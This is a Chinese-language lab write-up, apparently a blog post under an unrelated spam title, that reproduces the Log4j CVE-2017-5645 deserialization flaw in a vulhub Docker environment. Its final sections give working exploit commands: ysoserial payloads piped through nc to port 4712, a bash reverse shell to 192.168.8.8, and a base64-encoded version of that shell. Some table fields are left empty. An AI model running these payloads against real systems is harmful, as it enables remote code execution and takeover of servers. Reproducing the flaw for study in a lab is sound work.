網(wǎng)站建設(shè)與制作考試題電商運營培訓
感謝互聯(lián)網(wǎng)提供分享知識與智慧,在法治的社會里,請遵守有關(guān)法律法規(guī)
文章目錄
- 1.1、漏洞描述
- 1.2、漏洞等級
- 1.3、影響版本
- 1.4、漏洞復現(xiàn)
- 1、基礎(chǔ)環(huán)境
- 2、漏洞掃描
- 3、漏洞驗證
- 1.5、深度利用
- 1、反彈Shell
說明 | 內(nèi)容 |
---|---|
漏洞編號 | CVE-2017-5645 |
漏洞名稱 | Log4j Server 反序列化命令執(zhí)行漏洞 |
漏洞評級 | 高危 |
影響范圍 | Apache Log4j 2.8.2之前的2.x版本 |
漏洞描述 | |
修復方案 |
1.1、漏洞描述
攻擊者可以通過發(fā)送一個特別制作的2進制payload,在組件將字節(jié)反序列化為對象時,觸發(fā)并執(zhí)行構(gòu)造的payload代碼。該漏洞主要是由于在處理ObjectInputStream時,接收函數(shù)對于不可靠來源的input沒有過濾。可以通過給TcpSocketServer和UdpSocketServer添加可配置的過濾功能以及一些相關(guān)設(shè)置,可以有效的解決該漏洞。
1.2、漏洞等級
漏洞危害評分:7.5,攻擊者可利用該漏洞執(zhí)行任意代碼。
1.3、影響版本
Apache Log4j 2.8.2之前的2.x版本
1.4、漏洞復現(xiàn)
1、基礎(chǔ)環(huán)境
kali環(huán)境IP地址:192.168.8.8
Path:vulhub/log4j/CVE-2017-5645
啟動測試環(huán)境:
sudo docker-compose up -d
2、漏洞掃描
3、漏洞驗證
掃描目標開啟的端口
ysoserial是在常見的java庫中發(fā)現(xiàn)的一組實用程序和面向?qū)傩缘木幊獭靶」ぞ哝湣?#xff0c;在適當?shù)臈l件下,可以利用執(zhí)行對象不安全反序列化的Java應(yīng)用程序。主驅(qū)動程序接受用戶指定的命令,并將其封裝在用戶指定的小工具鏈中,然后將這些對象序列化為stdout。當類路徑上具有所需小工具的應(yīng)用程序不安全地反序列化該數(shù)據(jù)時,將自動調(diào)用該鏈并導致在應(yīng)用程序主機上執(zhí)行該命令。
ysoserial項目地址:
https://github.com/frohoff/ysoserial
下載打包好的jar文件到我們的kali主機上
進行利用,先創(chuàng)建一個文件,來進行測試
java -jar ysoserial-all.jar CommonsCollections5 "touch /tmp/saury" | nc 192.168.8.8 4712
1.5、深度利用
1、反彈Shell
bash -i >& /dev/tcp/192.168.8.8/6868 0>&1
將反彈shell進行base64編碼
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjguOC82ODY4IDA+JjE=
shell反彈
java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjguOC82ODY4IDA+JjE=}|{base64,-d}|{bash,-i}" | nc 192.168.8.8 4712